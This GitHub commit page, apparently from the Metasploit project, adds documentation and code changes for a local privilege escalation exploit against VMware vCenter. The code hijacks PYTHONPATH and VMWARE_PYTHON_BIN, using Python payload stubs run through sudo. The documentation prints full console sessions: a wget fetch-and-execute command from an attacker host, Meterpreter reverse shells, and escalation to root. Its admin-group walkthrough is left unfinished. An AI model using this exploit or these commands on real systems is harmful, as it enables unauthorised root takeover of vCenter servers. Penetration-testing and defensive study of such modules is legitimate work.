Skip to content

Commit

Permalink
operator working
Browse files Browse the repository at this point in the history
  • Loading branch information
@h00die
h00die committed Nov 19, 2024
1 parent f38661d commit 6bd049e
Show file tree
Hide file tree
Showing 2 changed files with 167 additions and 14 deletions.
136 changes: 136 additions & 0 deletions documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -131,3 +131,139 @@ Server username: root
(Meterpreter 1)(/tmp) > getuid
Server username: pod
```

#### Operator Group

If the user `mal` exists, use that. If not, follow the bellow instructions

Make a user in the operator group:

```
sudo useradd -m -s /bin/bash operator1
sudo usermod -aG users operator1
sudo usermod -aG operator operator1
```

This may be enough, but on my install which didn't complete I had to add the sudo entry manually.

```
visudo
```

Add the following at the end:

```
User_Alias PYTHON_USERS = operator1
Defaults:PYTHON_USERS env_keep += "PYTHONPATH"
```

Start our first handler

```
[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
lhost => 2.2.2.2
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
srvport => 8181
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
target => 7
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Using URL: http://2.2.2.2:8181/eEgibKL2K
[*] Server started.
[*] Run the following command on the target machine:
wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x JSlY5cPV; ./JSlY5cPV& disown
[*] Sending stage (3045380 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
```

Priv Esc

```
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2
lhost => 2.2.2.2
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870
lport => 9870
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set verbose true
verbose => true
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false
autocheck => false
[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run
[*] Started reverse TCP handler on 2.2.2.2:9870
[!] AutoCheck is disabled, proceeding with exploitation
[*] Utilizing PYTHONPATH exploitation method for operator group.
[*] Writing '/tmp/Ma5gGdnt' (250 bytes) ...
[*] Launching exploit...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 1.1.1.1
[+] Deleted /tmp/Ma5gGdnt
[+] Deleted /tmp/spwd.py
[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:40550) at 2024-11-18 16:27:28 -0500
(Meterpreter 2)(/tmp) >
(Meterpreter 2)(/tmp) > getuid
Server username: root
(Meterpreter 2)(/tmp) > background
[*] Backgrounding session 2...
s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/tmp) > getuid
Server username: operator1
```

#### Admin Group

If the user `admin` exists, use that. If not, follow the bellow instructions

Make a user in the operator group:

```
sudo useradd -m -s /bin/bash admin
sudo usermod -aG admin admin
sudo usermod -aG users admin
```

Start our first handler

```
[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2
lhost => 2.2.2.2
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181
srvport => 8181
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7
target => 7
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Using URL: http://2.2.2.2:8181/Hul7qG
[*] Server started.
[*] Run the following command on the target machine:
wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x IsMq60f5; ./IsMq60f5& disown
[*] Sending stage (3045380 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500
```

Priv Esc

```
```


XXX to be completed
45 changes: 31 additions & 14 deletions modules/exploits/linux/local/vcenter_sudo_lpe.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -70,52 +70,61 @@ def check
# we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS
# technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead
return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild

vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}")

return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d
(vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r
(vbuild_version > Rex::Version.new('7.0.0') && vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r

vprint_good("Exploitable version detected: #{vbuild_version}")

@user = cmd_exec('whoami').chomp
@groups = cmd_exec('groups').chomp.split(' ')
if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any?
vprint_good("User is vulnerable")
vprint_good('User is vulnerable')
else
return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})")
end

CheckCode::Appears("System seems exploitable")
CheckCode::Appears('System seems exploitable')
end

def exploit_operator_group
# for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we
# modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution
vprint_status("Utilizing PYTHONPATH exploitation method for operator group.")
vprint_status('Utilizing PYTHONPATH exploitation method for operator group.')
vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py'

return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe
return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe

# Upload payload executable
payload_path = "#{base_dir}/spwd.py"
payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)

# Upload payload stub
payload_stub = "#{base_dir}/spwd.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)

timeout = 30
print_status 'Launching exploit...'
output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout
output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout
output.each_line { |line| vprint_status line.chomp }
end

def exploit_pod_user
# for this exploit we abuse install-parametery as it does a 'from appliance...', so if we
# modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution
vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.")
vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.')
mkdir("#{base_dir}/appliance")


# Upload payload executable
payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)

# Upload payload stub
payload_stub = "#{base_dir}/appliance/__init__.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)
Expand All @@ -129,14 +138,22 @@ def exploit_pod_user
def exploit_admin_group
# for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN
# so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution
vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.")
vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.')
mkdir("#{base_dir}/appliance")
payload_path = "#{base_dir}/__init__.py"

# Upload payload executable
payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
upload_and_chmodx payload_path, generate_payload_exe
register_files_for_cleanup(payload_path)

# Upload payload stub
payload_stub = "#{base_dir}/appliance/__init__.py"
write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
register_files_for_cleanup(payload_stub)

timeout = 30
print_status 'Launching exploit...'
output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout
output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout
output.each_line { |line| vprint_status line.chomp }
end

Expand All @@ -145,9 +162,9 @@ def exploit
@groups = cmd_exec('groups').chomp.split(' ') if @groups.nil?
if @user == 'pod'
exploit_pod_user
elsif @group.contains? 'operator'
elsif @groups.include? 'operator'
exploit_operator_group
elsif @group.contains? 'admin'
elsif @groups.include? 'admin'
exploit_admin_group
end
end
Expand Down

0 comments on commit 6bd049e

Please sign in to comment.